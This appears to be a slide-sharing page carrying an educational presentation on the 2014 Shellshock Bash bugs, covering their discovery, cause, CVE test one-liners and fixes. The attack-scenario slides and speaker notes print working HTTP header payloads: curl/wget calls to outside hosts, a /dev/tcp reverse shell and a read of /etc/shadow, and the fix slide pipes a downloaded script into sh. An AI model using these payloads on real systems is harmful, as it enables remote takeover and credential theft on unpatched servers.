The Shellshocker
•Als PPTX, PDF herunterladen•
1 gefällt mir•1,246 views
This document summarizes the Shellshock bug in Bash software discovered in September 2014. It describes four vulnerabilities (CVE-2014-6271, CVE-2014-6277, CVE-2014-7169, and an unknown CVE) that could allow remote code execution by manipulating environment variables passed to Bash. The document also outlines potential attack scenarios like reverse shells, data theft, and click fraud that could exploit Shellshock. It concludes by mentioning Patch 27 and a script to fix the vulnerable Bash versions.
Empfohlen
Weitere ähnliche Inhalte
Was ist angesagt?
Was ist angesagt? (20)
Andere mochten auch
Andere mochten auch (19)
Ähnlich wie The Shellshocker
Ähnlich wie The Shellshocker (15)
Kürzlich hochgeladen
Kürzlich hochgeladen (20)
The Shellshocker
- 1. Sharath Unni @haxorhead http://hackabab.com/shellshock/
- 2. DISCOVERY Stéphane Chazelas discovered the bug on 12 September 2014, told a few and publicly announced on 24th Sept CVE-2014-6271 By 25th Sept, botnets had sprung up performing DDoS. By 26th Sept, a botnet called “wopbot”, was being used DDoS attack against Akamai Technologies and to scan the US DoD.
- 3. BACKGROUND Affects Bash up to version 4.3 Patch 26 Analysis of the source code shows the bug existed as early as 1.13 in 1992 Each program running under Unix like OS has access to a list of env variables. These are passed to new programs started by the parent. Bash maintains a list of functions, callable only from within Bash. Bash can exec itself. Exporting env variables and func defs.
- 4. BACKGROUND Exported functions def begin with () in the new bash’s env var list. New bash reads the value of the env var list and converts them back to functions This conversion is done by executing code from the value, creating the func on the fly. Vulnerable versions of bash do not check if the value contains only func def Passing a func value & code will cause code to be called as well
- 5. CVE-2014-6271 First bug - Stéphane Chazelas env x='() { :;}; echo vulnerable' bash -c "date“ Breakdown () { :; }; - Empty environment variable declaration /bin/bash –c - Call into Bash and pass a string with a command echo vulnerable – command that ideally should not be executed
- 6. CVE-2014-6277 • Discovered by Michał Zalewski bash -c "f() { x() { _;}; x() { _;} <<a; }" 2>/dev/null || echo vulnerable
- 7. CVE-2014-7169 Third bug – Tavis Ormandy It was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. env X='() { (a)=>' bash -c "echo date"; cat echo ; rm -f echo
- 8. UNKNOWN CVE Fourth bug env -i X=' () { }; echo hello' bash -c 'date' Demo
- 9. ATTACK SCENARIOS Automated Click Fraud – Blackhat SEO Accept: () { :;}; /bin/bash -c "curl http://31.41.42[.]109/search/wphp/j.php?cgi=XXX" User-Agent: () { :;}; /bin/bash -c "wget -q -O /dev/null http://ad.dipad[.]biz/test/http://XXXXXX.com/“5
- 10. ATTACK SCENARIOS dev/tcp reverse shell GET /cgi-bin/ HTTP/1.1 Host: x.x.x.x User-Agent: () { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/handler-ip/3333 0>&1'
- 11. ATTACK SCENARIOS Data theft GET /cgi-bin/status.cgi HTTP/1.0 User-Agent: () { :;}; echo "Bag:" $(</etc/shadow)
- 12. FIXES Patch 27 - https://ftp.gnu.org/gnu/bash/bash-4.3-patches/ curl https://shellshocker.net/fixbash | sh
- 13. THANK YOU! @haxorhead http://www.hackabab.com/
Hinweis der Redaktion
- Reference: http://www.pcworld.com/article/2687763/safe-from-shellshock-how-to-protect-your-home-computer-from-the-bash-shell-bug.html
- env x='() { :;}; echo vulnerable' bash -c “date”
- env x=‘bash -c "f() { x() { _;}; x() { _;} <<a; }" 2>/dev/null || echo vulnerable’
- env X='() { (a)=>\' bash -c "echo date"; cat echo ; rm -f echo
- Reverse shell: User-Agent: () { :; }; /bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.133.160/3333 0>&1'
- Data theft: User-Agent: () { :;}; echo "Bag:" $(</etc/shadow)
- Data theft: User-Agent: () { :;}; echo "Bag:" $(</etc/shadow)